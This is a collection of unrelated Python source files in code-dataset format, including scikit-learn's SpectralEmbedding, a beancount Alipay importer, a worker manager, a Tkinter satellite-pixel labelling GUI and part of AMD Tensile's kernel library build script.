- 'precomputed_nearest_neighbors' : interpret ``X`` as a sparse graph
of precomputed nearest neighbors, and constructs the affinity matrix
by selecting the ``n_neighbors`` nearest neighbors.
- callable : use passed in function as affinity
the function takes in data matrix (n_samples, n_features)
and return affinity matrix (n_samples, n_samples).
gamma : float, default=None
Kernel coefficient for rbf kernel. If None, gamma will be set to
1/n_features.
random_state : int, RandomState instance or None, default=None
Determines the random number generator used for the initialization of
the lobpcg eigenvectors when ``solver`` == 'amg'. Pass an int for
reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
eigen_solver : {'arpack', 'lobpcg', 'amg'}, default=None
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems.
If None, then ``'arpack'`` is used.
n_neighbors : int, default=None
Number of nearest neighbors for nearest_neighbors graph building.
If None, n_neighbors will be set to max(n_samples/10, 1).
n_jobs : int, default=None
The number of parallel jobs to run.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
embedding_ : ndarray of shape (n_samples, n_components)
Spectral embedding of the training matrix.
affinity_matrix_ : ndarray of shape (n_samples, n_samples)
Affinity_matrix constructed from samples or precomputed.
n_neighbors_ : int
Number of nearest neighbors effectively used.
Examples
--------
>>> from sklearn.datasets import load_digits
>>> from sklearn.manifold import SpectralEmbedding
>>> X, _ = load_digits(return_X_y=True)
>>> X.shape
(1797, 64)
>>> embedding = SpectralEmbedding(n_components=2)
>>> X_transformed = embedding.fit_transform(X[:100])
>>> X_transformed.shape
(100, 2)
References
----------
- A Tutorial on Spectral Clustering, 2007
<NAME>
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- On Spectral Clustering: Analysis and an algorithm, 2001
<NAME>, <NAME>, <NAME>
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.19.8100
- Normalized cuts and image segmentation, 2000
<NAME>, <NAME>
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
"""
@_deprecate_positional_args
def __init__(self, n_components=2, *, affinity="nearest_neighbors",
gamma=None, random_state=None, eigen_solver=None,
n_neighbors=None, n_jobs=None):
self.n_components = n_components
self.affinity = affinity
self.gamma = gamma
self.random_state = random_state
self.eigen_solver = eigen_solver
self.n_neighbors = n_neighbors
self.n_jobs = n_jobs
def _more_tags(self):
return {'pairwise': self.affinity in ["precomputed",
"precomputed_nearest_neighbors"]}
# TODO: Remove in 1.1
# mypy error: Decorated property not supported
@deprecated("Attribute _pairwise was deprecated in " # type: ignore
"version 0.24 and will be removed in 1.1 (renaming of 0.26).")
@property
def _pairwise(self):
return self.affinity in ["precomputed",
"precomputed_nearest_neighbors"]
def _get_affinity_matrix(self, X, Y=None):
"""Calculate the affinity matrix from data
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : array-like of shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
Y: Ignored
Returns
-------
affinity_matrix of shape (n_samples, n_samples)
"""
if self.affinity == 'precomputed':
self.affinity_matrix_ = X
return self.affinity_matrix_
if self.affinity == 'precomputed_nearest_neighbors':
estimator = NearestNeighbors(n_neighbors=self.n_neighbors,
n_jobs=self.n_jobs,
metric="precomputed").fit(X)
connectivity = estimator.kneighbors_graph(X=X, mode='connectivity')
self.affinity_matrix_ = 0.5 * (connectivity + connectivity.T)
return self.affinity_matrix_
if self.affinity == 'nearest_neighbors':
if sparse.issparse(X):
warnings.warn("Nearest neighbors affinity currently does "
"not support sparse input, falling back to "
"rbf affinity")
self.affinity = "rbf"
else:
self.n_neighbors_ = (self.n_neighbors
if self.n_neighbors is not None
else max(int(X.shape[0] / 10), 1))
self.affinity_matrix_ = kneighbors_graph(X, self.n_neighbors_,
include_self=True,
n_jobs=self.n_jobs)
# currently only symmetric affinity_matrix supported
self.affinity_matrix_ = 0.5 * (self.affinity_matrix_ +
self.affinity_matrix_.T)
return self.affinity_matrix_
if self.affinity == 'rbf':
self.gamma_ = (self.gamma
if self.gamma is not None else 1.0 / X.shape[1])
self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma_)
return self.affinity_matrix_
self.affinity_matrix_ = self.affinity(X)
return self.affinity_matrix_
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : {array-like, sparse matrix}, shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
y : Ignored
Returns
-------
self : object
Returns the instance itself.
"""
X = self._validate_data(X, accept_sparse='csr', ensure_min_samples=2,
estimator=self)
random_state = check_random_state(self.random_state)
if isinstance(self.affinity, str):
if self.affinity not in {"nearest_neighbors", "rbf", "precomputed",
"precomputed_nearest_neighbors"}:
raise ValueError(("%s is not a valid affinity. Expected "
"'precomputed', 'rbf', 'nearest_neighbors' "
"or a callable.") % self.affinity)
elif not callable(self.affinity):
raise ValueError(("'affinity' is expected to be an affinity "
"name or a callable. Got: %s") % self.affinity)
affinity_matrix = self._get_affinity_matrix(X)
self.embedding_ = spectral_embedding(affinity_matrix,
n_components=self.n_components,
eigen_solver=self.eigen_solver,
random_state=random_state)
return self
def fit_transform(self, X, y=None):
"""Fit the model from data in X and transform X.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : {array-like, sparse matrix} of shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
y : Ignored
Returns
-------
X_new : array-like of shape (n_samples, n_components)
"""
self.fit(X)
return self.embedding_
| StarcoderdataPython |
1638317 | import calendar
import csv
import datetime
from datetime import date
from io import StringIO
import xlrd
from beancount.core import data
from beancount.core.data import Note, Transaction
from . import (DictReaderStrip, get_account_by_guess,
get_income_account_by_guess)
from .base import Base
from .deduplicate import Deduplicate
Account余额宝 = 'Assets:Company:Alipay:MonetaryFund'
incomes = ['余额自动转入', '收益', '单次转入']
class YuEBao(Base):
def __init__(self, filename, byte_content, entries, option_map):
if not filename.endswith('xls'):
raise 'Not YuEBao!'
data = xlrd.open_workbook(filename)
table = data.sheets()[0]
rows_value = table.row_values(0)
if rows_value[0] != '余额宝收支明细查询':
raise 'Not YuEBao!'
self.book = data
self.table = table
self.deduplicate = Deduplicate(entries, option_map)
def parse(self):
table = self.table
rows = table.nrows
for i in range(5, rows - 4):
row = table.row_values(i)
time = datetime.datetime(
*xlrd.xldate_as_tuple(table.cell_value(rowx=i, colx=0), self.book.datemode))
print("Importing {} price = {} balance = {}".format(
time, row[2], row[3]))
meta = {}
amount = float(row[1])
entry = Transaction(
meta,
date(time.year, time.month, time.day),
'*',
'余额宝',
'余额宝',
data.EMPTY_SET,
data.EMPTY_SET, []
)
if not row[2] in incomes:
amount = -amount
if self.deduplicate.find_duplicate(entry, amount, None, Account余额宝):
print(
"Unknown transaction for {}, check if Alipay transaction exists.".format(time))
self.deduplicate.apply_beans()
return []
| StarcoderdataPython |
1695596 | <filename>tanit/master/core/worker/worker_manager.py
import logging as lg
from datetime import datetime
from threading import RLock
from .worker import WorkerState
from .worker_monitor import WorkerMonitor
_logger = lg.getLogger(__name__)
class WorkerManager(object):
"""Monitor and Maintain workers states.
The WorkerManager monitor the state of workers and maintain the list of active/dead workers.
It is not really part of the execution pipeline, its role is just to keep tack of which
machines are active and fetch their state.
""" # NOQA
def __init__(self, workers_factory):
self.worker_factory = workers_factory
self.workers = []
self.lock = RLock()
# monitor
self.monitor = WorkerMonitor(self)
def start(self):
_logger.info("Stating tanit worker manager.")
self.monitor.start()
_logger.info("Tanit worker manager started.")
def stop(self):
_logger.info("Stopping tanit worker manager.")
self.monitor.stop()
with self.lock:
for wkr in self.list_workers():
wkr.stop()
_logger.info("Tanit worker manager stopped.")
def disable_monitor(self):
self.monitor.heartbeat_check_interval = -1
def get_worker(self, wid):
with self.lock:
for wkr in self.workers:
if wkr.wid == wid:
return wkr
return None
def list_workers(self, state=None):
with self.lock:
if state is None:
return self.workers
else:
return [wkr for wkr in self.list_workers() if wkr.state == state]
def list_active_workers(self):
return self.list_workers(state=WorkerState.ACTIVE)
def register_worker(self, worker):
"""Register a Worker.
Register the worker in the worker manager.
Note: This does not activate the worker.
"""
_logger.info("Registering new Worker [ %s ].", worker.wid)
with self.lock:
remote_worker = self.get_worker(worker.wid)
if remote_worker is not None:
if remote_worker.wid == worker.wid:
_logger.warning("Worker [ %s ] is already registered.", worker.wid)
elif (
remote_worker.address == worker.address
and remote_worker.port == worker.port
and worker.address is not None
and worker.port is not None
):
_logger.warning(
"Worker running on address [ %s ] and port [ %s ] "
+ "is already registered.",
worker.address,
worker.port,
)
elif remote_worker.address == worker.address:
_logger.warning(
"Another Worker [ %s ] is already running on [ %s ].",
worker.wid,
worker.address,
)
else:
remote_worker = self.worker_factory.create_worker(worker)
remote_worker.start()
self.workers.append(remote_worker)
_logger.info("Worker [ %s ] registered.", worker.wid)
def activate_worker(self, wid):
"""Activate a Worker.
Transition worker to state `ACTIVE`.
Worker in any state except `DEACTIVATING` can be activated
"""
_logger.info("Activating Worker [ %s ]", wid)
with self.lock:
remote_worker = self.get_worker(wid)
if remote_worker is not None:
if remote_worker.state == WorkerState.DEACTIVATING:
_logger.error("Cannot activate worker in decommissioning state.")
raise IllegalWorkerStateException(
"Cannot activate worker in decommissioning state."
)
elif remote_worker.state == WorkerState.DEAD:
_logger.warning(
"Worker %s is in %s state, forcing activation"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[WorkerState.DEAD],
)
)
_logger.info(
"Transitioning worker from state %s to %s"
% (
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.ACTIVE],
)
)
remote_worker.state = WorkerState.ACTIVE
else:
raise NoSuchWorkerException("No such worker [ %s ]", wid)
_logger.info("Worker [ %s ] Activated", wid)
def deactivate_worker(self, wid):
"""Deactivate a Worker.
Transition worker to state `DEACTIVATING`.
This does not really decommission the worker but rather schedule it
for decommissioning by the `WorkerDecommissioner`.
Only workers in state `ACTIVE` transition to `DEACTIVATING` state.
"""
_logger.info("Deactivating Worker [ %s ]", wid)
with self.lock:
remote_worker = self.get_worker(wid)
if remote_worker is not None:
if remote_worker.state == WorkerState.ACTIVE:
remote_worker.state = WorkerState.DEACTIVATING
elif remote_worker.state in [
WorkerState.DEACTIVATING,
WorkerState.DEACTIVATED,
]:
_logger.info("Worker [ %s ] already decommissioned.", wid)
elif remote_worker.state == WorkerState.ALIVE:
_logger.info(
"Worker %s in state %s , forcing state %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[WorkerState.ALIVE],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATED],
)
)
remote_worker.state = WorkerState.DEACTIVATED
else:
_logger.error(
"Cannot transition worker %s from state %s to %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATING],
)
)
raise IllegalWorkerStateException(
"Cannot transition worker %s from state %s to %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATING],
)
)
else:
raise NoSuchWorkerException("No such worker [ %s ]", wid)
_logger.info("Worker [ %s ] deactivated", wid)
def register_heartbeat(self, worker):
with self.lock:
remote_worker = self.get_worker(worker.wid)
if remote_worker is not None:
remote_worker.last_hear_beat = datetime.now()
if remote_worker.state == WorkerState.DEAD:
remote_worker.state = WorkerState.ALIVE
else:
# register the worker without activating
_logger.info(
"Received heartbeat from unknown worker %s, registering it."
% worker.wid
)
self.register_worker(worker)
class IllegalWorkerStateException(Exception):
pass
class NoSuchWorkerException(Exception):
pass
class AlreadyRegisteredWorkerException(Exception):
pass
| StarcoderdataPython |
3235354 | <filename>docs/hyperpython/hp03.py
from hyperpython import h
from htm import htm
# start
@htm
def html(tag, props, children):
if callable(tag):
return tag()
return h(tag, props, children)
def Heading():
return html('<header>Hello World</header>')
result03 = str(html("""
<{Heading}><//>
"""))
| StarcoderdataPython |
3214099 | <filename>setup.py
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
with open(os.path.join('flagging_site', '__init__.py'), encoding='utf8') as f:
version = re.search(r"__version__ = '(.*?)'", f.read()).group(1)
with open('README.md', encoding='utf8') as f:
readme = f.read()
setup(
name='CRWA Flagging Website',
version=version,
packages=find_packages(),
author='<NAME>',
python_requires='>=3.7.1',
maintainer='Charles River Watershed Association',
license='MIT',
include_package_data=True,
setup_requires=[
'pytest-runner',
],
tests_require=[
'pytest',
'pytest-cov'
],
install_requires=[
'pandas',
'flask',
'jinja2',
'flasgger',
'requests',
'Flask-SQLAlchemy',
'Flask-Admin',
'Flask-BasicAuth',
'py7zr'
],
extras_require={
'windows': ['psycopg2'],
'osx': ['psycopg2-binary']
},
url='https://github.com/codeforboston/flagging',
description='Flagging website for the CRWA',
long_description=readme,
long_description_content_type='text/markdown',
)
| StarcoderdataPython |
95883 | from urllib.parse import urlparse
from django.test import TestCase
# Create your tests here.
from smart_bookmarks.core.utils import url_guid
def test_foo():
guid = url_guid(
"https://stackoverflow.com/questions/3278077/difference-between-getattr-vs-getattribute/3278104?q=alamakota#1234567"
)
print(guid)
| StarcoderdataPython |
3211695 | <reponame>Melykuti/sh-pixel-labelling
# This is the code to define the graphical user interface (GUI) with Tkinter
from datetime import datetime, timedelta
import json
import numpy as np
import os
from PIL import Image, ImageTk
import tkinter as tk
from utils.downloading import SH_TCI_retrieve_successor
from utils.utils import rows_to_pairs, consolidate_name
class ImagePanel(tk.Canvas):
def __init__(self, master, img):
#self.grid(row=0, column=0)
hei, wid = img.shape[0], img.shape[1]
self.width=master.magnification*wid
self.height=master.magnification*hei
tk.Canvas.__init__(self, master, width=self.width, height=self.height)
self.bind("<Button-1>", self.pixelclick)
self.img_orig = img
self.draw_image(self.img_orig, self.master.pxs)
def draw_image(self, img_orig, l):
if len(l)>0:
img = img_orig.copy()
for px in l:
# Black:
#img[px[0], px[1], :] = 0
# Magenta:
#img[px[0], px[1], 0] = 192
#img[px[0], px[1], 1] = 0
#img[px[0], px[1], 2] = 192
img[px[0], px[1], 0] = self.master.colour_for_selection[0]
img[px[0], px[1], 1] = self.master.colour_for_selection[1]
img[px[0], px[1], 2] = self.master.colour_for_selection[2]
else:
img = img_orig.copy()
img = np.kron(img, np.ones((self.master.magnification, self.master.magnification), dtype=np.uint8)[:,:,np.newaxis])
self.imgPIL=ImageTk.PhotoImage(Image.fromarray(img))
self.create_image((0, 0), image=self.imgPIL, anchor='nw', state="normal")
def pixelclick(self, event):
col, row = event.x//self.master.magnification, event.y//self.master.magnification
#print("Clicked at row {0}, column {1}.".format(row, col))
if [row, col] in self.master.pxs:
self.master.pxs.remove([row, col])
else:
self.master.pxs.append([row, col])
self.draw_image(self.img_orig, self.master.pxs)
class ButtonsPanel(tk.Frame):
def __init__(self, master):
frame = tk.Frame.__init__(self, master)
#self.grid(row=0, column=1, sticky="s")
self.createWidgets()
return frame
def createWidgets(self):
self.skip = tk.Button(self, text="Skip", command=self.skp, padx=5)
self.skip.grid(row=0)
self.savencontinue = tk.Button(self, text="Save & Continue", command=self.snc)
self.savencontinue.grid(row=1)
self.savenquit = tk.Button(self, text="Save & Quit", command=self.snq, padx=2)
self.savenquit.grid(row=2)
self.cancel = tk.Button(self, text="Cancel", command=self.cnq, padx=4)
self.cancel.grid(row=3)
def skp(self):
# active_date, next_date are strings in YYYY-MM-DD format
active_date = self.master.location['date']
print("Skipping " + active_date)
# increment date by 1 day
next_date = datetime.strftime(datetime.strptime(active_date, '%Y-%m-%d') + timedelta(1),
'%Y-%m-%d')
self.master.location['date'] = next_date
#local_location = self.master.location.copy()
#local_location['date'] = next_date
active_date = self.master.create_workspace(self.master, self.master.location)
#active_date = self.master.create_workspace(self.master, local_location)
self.master.location['date'] = active_date
def snc(self):
# active_date, next_date are strings in YYYY-MM-DD format
active_date = self.master.location['date']
print("Saving {0} & Continuing".format(active_date))
self.master.locations_json[active_date] = self.master.location.copy()
self.master.locations_json[active_date]['px'] = self.master.pxs.copy()
self.savetofile()
# increment date by 1 day
next_date = datetime.strftime(datetime.strptime(active_date, '%Y-%m-%d') + timedelta(1), '%Y-%m-%d')
self.master.location['date'] = next_date
active_date = self.master.create_workspace(self.master, self.master.location)
self.master.location['date'] = active_date
def snq(self):
# active_date is a string in YYYY-MM-DD format
active_date = self.master.location['date']
print("Saving {0} & Quitting".format(active_date))
self.master.locations_json[active_date] = self.master.location.copy()
self.master.locations_json[active_date]['px'] = self.master.pxs.copy()
self.savetofile()
self.master.destroy()
def cnq(self):
active_date = self.master.location['date']
print("Cancel. Quitting without saving {0}.".format(active_date))
self.master.destroy()
def savetofile(self):
if not os.path.exists(self.master.output_folder):
os.makedirs(self.master.output_folder)
# save dict of dates and pixels in JSON, named using locations[k]['name']
with open(os.path.join(self.master.output_folder, consolidate_name(self.master.location['name']) + '_' + self.master.level_choice + '_locations.json'), 'w') as openfile:
openfile.write(json.dumps(self.master.locations_json, ensure_ascii=False, indent=0))
# Saving pixel intensity values will be done separately.
class BigFrame(tk.Tk):
def __init__(self, location, INSTANCE_ID, LAYER_NAME_TCI, DATA_SOURCE, magnification, colour_for_selection, output_folder, level_choice):
tk.Tk.__init__(self)
# location['px'] (px) is an np.array of size (2 x nr_of_pixels). self.master.pxs is a list of pairs.
self.location = location
self.pxs = rows_to_pairs(location['px'])
self.INSTANCE_ID = INSTANCE_ID
self.LAYER_NAME_TCI = LAYER_NAME_TCI
self.DATA_SOURCE = DATA_SOURCE
self.magnification = magnification
self.colour_for_selection = colour_for_selection
self.output_folder = output_folder
self.level_choice = level_choice
self.canvas = tk.Canvas().grid(row=0, column=0)
self.but = ButtonsPanel(master=self).grid(row=0, column=1)#, sticky="s")
active_date = self.create_workspace(self, self.location)
self.location['date'] = active_date
self.locations_json = dict()
def create_workspace(self, root, location):
wms_true_color_imgs, available_dates = SH_TCI_retrieve_successor(location, self.INSTANCE_ID, self.LAYER_NAME_TCI, self.DATA_SOURCE)
print('Next available dates: ', [datetime.strftime(ad, '%Y-%m-%d %H:%M:%S') for ad in available_dates])
if len(available_dates)>0:
img = wms_true_color_imgs[0]
#px = location['px']
self.imgpanel = ImagePanel(root, img).grid(row=0, column=0)
#self.imgpanel = ImagePanel(root, img, px).grid(row=0, column=0)
#self.imgpanel = ImagePanel(self.canvas, img, px, magnification, root.colour_for_selection).grid(row=0, column=0)
return datetime.strftime(available_dates[0], '%Y-%m-%d')
else:
print('You reached the present.')
#self.but.cnq()
#self.bbb
#self.destroy()
root.destroy()
| StarcoderdataPython |
67416 | <reponame>sunway513/Tensile<gh_stars>0
################################################################################
# Copyright (C) 2016-2019 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
# This script only gets called by CMake
if __name__ == "__main__":
print("This file can no longer be run as a script. Run 'Tensile/bin/TensileCreateLibrary' instead.")
exit(1)
from . import Common
from . import EmbeddedData
from . import Utils
from . import YAMLIO
from .Common import globalParameters, HR, print1, print2, printExit, ensurePath, \
CHeader, CMakeHeader, assignGlobalParameters, ProgressBar, \
listToInitializer
from .KernelWriterAssembly import KernelWriterAssembly
from .KernelWriterSource import KernelWriterSource
from .SolutionStructs import Solution
from .SolutionWriter import SolutionWriter
import argparse
import collections
import itertools
import os
import shutil
import subprocess
import sys
import time
################################################################################
def processKernelSource(kernel, kernelWriterSource, kernelWriterAssembly):
"""
Generate source for a single kernel.
Returns (error, source, header, kernelName).
"""
try:
kernelWriter = kernelWriterSource if kernel["KernelLanguage"] == "Source" else kernelWriterAssembly
# get kernel name
kernelName = kernelWriter.getKernelName(kernel)
#sys.stderr.write("kernel:%s\n"% kernelName)
(err, src) = kernelWriter.getSourceFileString(kernel)
header = kernelWriter.getHeaderFileString(kernel)
except RuntimeError:
return (1, "", "", kernelName)
return (err, src, header, kernelName)
def getAssemblyCodeObjectFiles(kernels, kernelWriterAssembly, outputPath):
destDir = ensurePath(os.path.join(outputPath, 'library'))
asmDir = kernelWriterAssembly.getAssemblyDirectory()
assemblyKernels = list([k for k in kernels if k['KernelLanguage'] == 'Assembly'])
if len(assemblyKernels) == 0:
return []
if globalParameters["MergeFiles"]:
archs = collections.defaultdict(list)
for k in assemblyKernels:
archs[tuple(k['ISA'])].append(k)
coFiles = []
for arch, archKernels in archs.items():
objectFiles = list([kernelWriterAssembly.getKernelName(k) + '.o' \
for k in archKernels \
if k['KernelLanguage'] == 'Assembly'])
if len(objectFiles) == 0:
continue
archName = 'gfx'+''.join(map(str,arch))
coFile = os.path.join(destDir, 'TensileLibrary_{}.co'.format(archName))
args = kernelWriterAssembly.getLinkCodeObjectArgs(objectFiles, coFile)
subprocess.check_call(args, cwd=asmDir)
coFiles.append(coFile)
return coFiles
else:
assemblyKernelNames = [kernelWriterAssembly.getKernelName(k) for k in assemblyKernels]
origCOFiles = [os.path.join(asmDir, k + '.co') for k in assemblyKernelNames]
newCOFiles = [os.path.join(destDir, k + '.co') for k in assemblyKernelNames]
for src, dst in Utils.tqdm(zip(origCOFiles, newCOFiles), "Copying code objects"):
shutil.copyfile(src, dst)
return newCOFiles
def which(p):
exes = [p+x for x in ['', '.exe', '.bat']]
system_path = os.environ['PATH'].split(os.pathsep)
for dirname in system_path+['/opt/rocm/bin']:
for exe in exes:
candidate = os.path.join(os.path.expanduser(dirname), exe)
if os.path.isfile(candidate):
return candidate
return None
def buildSourceCodeObjectFile(CxxCompiler, outputPath, kernelFile):
buildPath = ensurePath(os.path.join(globalParameters['WorkingPath'], 'code_object_tmp'))
destDir = ensurePath(os.path.join(outputPath, 'library'))
(_, filename) = os.path.split(kernelFile)
(base, _) = os.path.splitext(filename)
objectFilename = base + '.o'
objectFilepath = os.path.join(buildPath, objectFilename)
soFilename = base + '.so'
soFilepath = os.path.join(buildPath, soFilename)
archs = ['gfx'+''.join(map(str,arch)) for arch in globalParameters['SupportedISA'] \
if globalParameters["AsmCaps"][arch]["SupportedISA"]]
archFlags = ['--amdgpu-target=' + arch for arch in archs]
if (CxxCompiler == 'hcc'):
hipFlags = subprocess.check_output([which('hcc-config'), '--cxxflags']).decode().split(' ')
# when HCC_HOME is defined -I/opt/rocm/include is *not* part of
# hcc-config --cxxflags; so we need hipconfig -C to be safe
hipFlags += subprocess.check_output([which('hipconfig'), '-C']).decode().split(' ')
hipLinkFlags = subprocess.check_output([which('hcc-config'), '--ldflags', '--shared']).decode().split(' ')
hipFlags += ['-I', outputPath, '-fPIC']
compileArgs = [which('hcc')] + hipFlags + [kernelFile, '-c', '-o', objectFilepath]
linkArgs = [globalParameters['AssemblerPath']] + hipLinkFlags + archFlags + [objectFilepath, '-shared', '-o', soFilepath]
extractArgs = [globalParameters['ExtractKernelPath'], '-i', soFilename]
#print(' '.join(compileArgs))
subprocess.check_call(compileArgs)
#print(' '.join(linkArgs))
subprocess.check_call(linkArgs)
#print(' '.join(extractArgs))
subprocess.check_call(extractArgs, cwd=buildPath)
coFilenames = ["{0}-000-{1}.hsaco".format(soFilename, arch) for arch in archs]
elif (CxxCompiler == "hipcc"):
hipFlags = ["--genco", "-D__HIP_HCC_COMPAT_MODE__=1"]
hipFlags += ['-I', outputPath]
compileArgs = [which('hipcc')] + hipFlags + archFlags + [kernelFile, '-c', '-o', soFilepath]
#print(' '.join(compileArgs))
subprocess.check_call(compileArgs)
coFilenames = [soFilename]
else:
raise RuntimeError("Unknown compiler {}".format(CxxCompiler))
extractedCOs = [os.path.join(buildPath, name) for name in coFilenames]
destCOs = [os.path.join(destDir, name) for name in coFilenames]
for (src, dst) in zip(extractedCOs, destCOs):
shutil.copyfile(src, dst)
return destCOs
def buildSourceCodeObjectFiles(CxxCompiler, kernelFiles, outputPath):
args = zip(itertools.repeat(CxxCompiler), itertools.repeat(outputPath), kernelFiles)
coFiles = Common.ParallelMap(buildSourceCodeObjectFile, args, "Compiling source kernels",
method=lambda x: x.starmap)
return itertools.chain.from_iterable(coFiles)
################################################################################
def prepAsm():
"""
Create and prepare the assembly directory - called ONCE per output dir:
"""
asmPath = ensurePath(os.path.join(globalParameters["WorkingPath"], "assembly") )
assemblerFileName = os.path.join(asmPath, \
"asm.%s"%("bat" if os.name=="nt" else "sh"))
assemblerFile = open(assemblerFileName, "w")
if os.name == "nt":
assemblerFile.write("echo Windows: Copying instead of Assembling\n")
assemblerFile.write("copy %1.s %1.o\n")
assemblerFile.write("copy %1.o %1.co\n")
else:
assemblerFile.write("#!/bin/sh %s\n" % ("-x" if globalParameters["PrintLevel"] >=2 else ""))
assemblerFile.write("# usage: asm.sh kernelName ASM_ARGS\n")
assemblerFile.write("# example: asm.sh kernelName -mcpu=gfx900\n")
assemblerFile.write("f=$1\n")
assemblerFile.write("shift\n")
assemblerFile.write("ASM=%s\n"%globalParameters["AssemblerPath"])
# cannot use globalParameters["CurrentISA"] because it might be (0,0,0)
defaultIsa = (9,0,0)
assemblerFile.write( \
"${ASM} -x assembler -target amdgcn-amd-amdhsa %s $@ -c -o $f.o $f.s\n" % \
("-mno-code-object-v3" if \
globalParameters["AsmCaps"][defaultIsa]["HasCodeObjectV3"] and \
globalParameters["CodeObjectVersion"] == "V2" else "-mcode-object-v3"))
assemblerFile.write("${ASM} -target amdgcn-amd-amdhsa $f.o -o $f.co\n")
assemblerFile.close()
os.chmod(assemblerFileName, 0o777)
################################################################################
def buildKernelSourceAndHeaderFiles(results, outputPath, kernelsWithBuildErrs, \
kernelSourceFile, kernelHeaderFile):
"""
Logs errors and writes appropriate info to kernelSourceFile and kernelHeaderFile.
Arguments:
results: list of (err, src, header, kernelName)
outputPath: path to source directory
kernelsWithBuildErrs: Dictionary to be updated with kernels that have errors
kernelSourceFile: File to write source data to
kernelHeaderFile: File to write header data to
"""
sourceFilenames = []
for (err,src,header,kernelName) in results:
if err:
kernelsWithBuildErrs[kernelName] = err
#print "*** warning: invalid kernel#%s"%kernelName
# write kernel.cpp
if not globalParameters["MergeFiles"]:
filename = os.path.join(outputPath, "Kernels", kernelName+".cpp")
sourceFilenames.append(filename)
kernelSourceFile = open(filename, "w")
kernelSourceFile.write(CHeader)
kernelSourceFile.write(src)
if not globalParameters["MergeFiles"]:
kernelSourceFile.close()
# write kernel.h
kernelHeaderFile = open(os.path.join(outputPath, "Kernels", kernelName+".h"), "w")
kernelHeaderFile.write(CHeader)
kernelHeaderFile.write(header)
if not globalParameters["MergeFiles"]:
kernelHeaderFile.close()
return sourceFilenames
################################################################################
# Write Solutions and Kernels for BenchmarkClient or LibraryClient
################################################################################
def writeSolutionsAndKernels(outputPath, CxxCompiler, problemTypes, solutions, kernels, kernelsBetaOnly, \
solutionWriter, kernelWriterSource, kernelWriterAssembly, errorTolerant=False):
start = time.time()
codeObjectFiles = []
print1("# Writing Kernels...")
if not globalParameters["MergeFiles"]:
ensurePath(os.path.join(outputPath, "Solutions"))
ensurePath(os.path.join(outputPath, "Kernels"))
##############################################################################
# Write Kernels
##############################################################################
kernelFiles = []
if globalParameters["MergeFiles"]:
kernelSourceFilename = os.path.join(outputPath, "Kernels.cpp")
kernelHeaderFilename = os.path.join(outputPath, "Kernels.h")
kernelFiles.append(kernelSourceFilename)
kernelSourceFile = open(kernelSourceFilename, "w")
kernelHeaderFile = open(kernelHeaderFilename, "w")
kernelSourceFile.write(CHeader)
kernelHeaderFile.write(CHeader)
kernelSourceFile.write("#include \"Kernels.h\"\n")
kernelHeaderFile.write("#pragma once\n")
if globalParameters["RuntimeLanguage"] == "HIP":
kernelHeaderFile.write("#include <hip/hip_runtime.h>\n")
kernelHeaderFile.write("#include <hip/hip_hcc.h>\n\n")
kernelHeaderFile.write("#include \"KernelHeader.h\"\n\n")
else:
kernelSourceFile = None
kernelHeaderFile = None
kernelsWithBuildErrs = {}
prepAsm()
kIter = zip(kernels, itertools.repeat(kernelWriterSource), itertools.repeat(kernelWriterAssembly))
results = Common.ParallelMap(processKernelSource, kIter, "Generating kernels", method=lambda x: x.starmap)
print(len(results))
removeKernels = []
removeSolutions = []
removeResults = []
for kernIdx in range(0, len(results)):
(err,src,header,kernelName) = results[kernIdx]
if(err == -2):
removeKernels.append(kernels[kernIdx])
removeSolutions.append(solutions[kernIdx])
removeResults.append(results[kernIdx])
for kern in removeKernels:
kernels.remove(kern)
for solut in removeSolutions:
solutions.remove(solut)
for rel in removeResults:
results.remove(rel)
